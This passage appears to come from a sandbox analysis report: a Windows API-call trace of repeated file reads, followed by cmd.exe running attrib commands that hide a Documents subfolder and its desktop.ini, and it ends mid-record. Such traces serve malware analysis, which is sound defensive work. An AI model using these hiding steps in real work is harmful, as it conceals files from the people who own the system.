lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, 
lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, 
lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: 
lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, 
lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.018] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.018] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.034] _close (_FileHandle=4) returned 0 [0133.034] FindNextFileW (in: hFindFile=0x1c0778, lpFindFileData=0x12ef58 | out: lpFindFileData=0x12ef58) returned 0 [0133.035] GetLastError () returned 0x12 [0133.035] FindClose (in: hFindFile=0x1c0778 | out: hFindFile=0x1c0778) returned 1 [0133.035] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0133.037] _close (_FileHandle=3) returned 0 [0133.038] GetConsoleTitleW (in: lpConsoleTitle=0x12f390, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.038] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.038] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.038] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.038] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0xffffffff [0133.038] GetLastError () returned 0x2 [0133.038] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0xffffffff [0133.038] GetLastError () returned 0x2 [0133.038] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0x1c0778 [0133.039] FindClose (in: 
hFindFile=0x1c0778 | out: hFindFile=0x1c0778) returned 1 [0133.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0xffffffff [0133.039] GetLastError () returned 0x2 [0133.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0x1c0778 [0133.039] FindClose (in: hFindFile=0x1c0778 | out: hFindFile=0x1c0778) returned 1 [0133.039] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0133.039] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.039] GetConsoleTitleW (in: lpConsoleTitle=0x12f124, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.039] InitializeProcThreadAttributeList (in: lpAttributeList=0x12efac, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f074 | out: lpAttributeList=0x12efac, lpSize=0x12f074) returned 1 [0133.039] UpdateProcThreadAttribute (in: lpAttributeList=0x12efac, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f06c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12efac, lpPreviousValue=0x0) returned 1 [0133.039] GetStartupInfoW (in: lpStartupInfo=0x12ef68 | out: lpStartupInfo=0x12ef68*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0133.039] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.039] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" ", 
lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f008*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f054 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" ", lpProcessInformation=0x12f054*(hProcess=0x4c, hThread=0x50, dwProcessId=0xa48, dwThreadId=0xbd8)) returned 1 [0133.041] CloseHandle (hObject=0x50) returned 1 [0133.041] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.041] GetEnvironmentStringsW () returned 0x1c2ce0* [0133.041] FreeEnvironmentStringsW (penv=0x1c2ce0) returned 1 [0133.041] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0133.079] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x12ef48 | out: lpExitCode=0x12ef48*=0x0) returned 1 [0133.079] CloseHandle (hObject=0x4c) returned 1 [0133.079] _vsnwprintf (in: _Buffer=0x12f090, _BufferCount=0x13, _Format="%08X", _ArgList=0x12ef54 | out: _Buffer="00000000") returned 8 [0133.079] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0133.080] GetEnvironmentStringsW () returned 0x1c2ce0* [0133.080] FreeEnvironmentStringsW (penv=0x1c2ce0) returned 1 [0133.080] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.080] GetEnvironmentStringsW () returned 0x1c2ce0* [0133.080] FreeEnvironmentStringsW (penv=0x1c2ce0) returned 1 [0133.080] DeleteProcThreadAttributeList (in: lpAttributeList=0x12efac | out: lpAttributeList=0x12efac) [0133.080] GetConsoleTitleW (in: lpConsoleTitle=0x12f390, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.080] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.080] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.080] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.080] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0xffffffff [0133.080] GetLastError () returned 0x2 [0133.081] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0xffffffff [0133.081] GetLastError () returned 0x2 [0133.081] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0x1c0778 [0133.081] FindClose (in: hFindFile=0x1c0778 | out: hFindFile=0x1c0778) returned 1 [0133.081] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0xffffffff [0133.081] GetLastError () returned 0x2 [0133.081] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0x1c0778 [0133.081] FindClose (in: hFindFile=0x1c0778 | out: hFindFile=0x1c0778) returned 1 
[0133.081] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0133.081] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.081] GetConsoleTitleW (in: lpConsoleTitle=0x12f124, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.081] InitializeProcThreadAttributeList (in: lpAttributeList=0x12efac, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f074 | out: lpAttributeList=0x12efac, lpSize=0x12f074) returned 1 [0133.081] UpdateProcThreadAttribute (in: lpAttributeList=0x12efac, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f06c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12efac, lpPreviousValue=0x0) returned 1 [0133.081] GetStartupInfoW (in: lpStartupInfo=0x12ef68 | out: lpStartupInfo=0x12ef68*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0133.081] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.082] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f008*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f054 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"", 
lpProcessInformation=0x12f054*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbe0, dwThreadId=0xbc0)) returned 1 [0133.083] CloseHandle (hObject=0x4c) returned 1 [0133.083] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.083] GetEnvironmentStringsW () returned 0x1c37b0* [0133.083] FreeEnvironmentStringsW (penv=0x1c37b0) returned 1 [0133.083] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0133.127] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12ef48 | out: lpExitCode=0x12ef48*=0x0) returned 1 [0133.127] CloseHandle (hObject=0x50) returned 1 [0133.127] _vsnwprintf (in: _Buffer=0x12f090, _BufferCount=0x13, _Format="%08X", _ArgList=0x12ef54 | out: _Buffer="00000000") returned 8 [0133.127] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0133.127] GetEnvironmentStringsW () returned 0x1c37b0* [0133.127] FreeEnvironmentStringsW (penv=0x1c37b0) returned 1 [0133.127] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.127] GetEnvironmentStringsW () returned 0x1c37b0* [0133.127] FreeEnvironmentStringsW (penv=0x1c37b0) returned 1 [0133.127] DeleteProcThreadAttributeList (in: lpAttributeList=0x12efac | out: lpAttributeList=0x12efac) [0133.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.127] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.127] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0133.128] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.128] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0133.128] SetConsoleInputExeNameW () returned 0x1 [0133.128] GetConsoleOutputCP () returned 0x1b5 [0133.128] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.128] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.128] exit (_Code=0) Process: id = 
"118" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16640" os_pid = "0xbf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "117" os_parent_pid = "0xa70" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12695 start_va = 